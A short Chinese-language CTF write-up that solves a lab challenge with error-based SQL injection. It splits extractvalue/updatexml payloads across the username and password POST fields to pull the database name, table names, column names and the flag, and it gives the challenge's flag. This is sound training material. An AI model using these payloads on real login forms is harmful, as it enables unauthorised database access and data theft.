加了料的报错注入SQL

地址： http://ctf5.shiyanbar.com/web/baocuo/index.php

参考资料：https://www.jianshu.com/p/95f18a32ec7b https://blog.****.net/he_and/article/details/80572740

源码中的有用信息：

要用post提交username和password，所以用burp

爆出当前库：username=‘or extractvalue /&password=/(1, concat(0x5c,(select database()))) or’

XPATH syntax error: ‘\error_based_hpf’

爆库：username=’ or updatexml/&password=1/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x7e),1) or ’

XPATH syntax error: ‘_{ffll44jj,users}’【error_based_hpf库中有ffll44jj,users两张表】

爆表：username=’ or updatexml/&password=1/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema regexp database() and table_name regexp 0x66666c6c34346a6a),0x7e),1) or ’

XPATH syntax error: ‘_value’【ffll44jj表中的列，表名用了16进制】

爆列：username=’ or updatexml/&password=1/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or ’

XPATH syntax error: ‘_{flag{err0r_b4sed_sqli_+_hpf}}’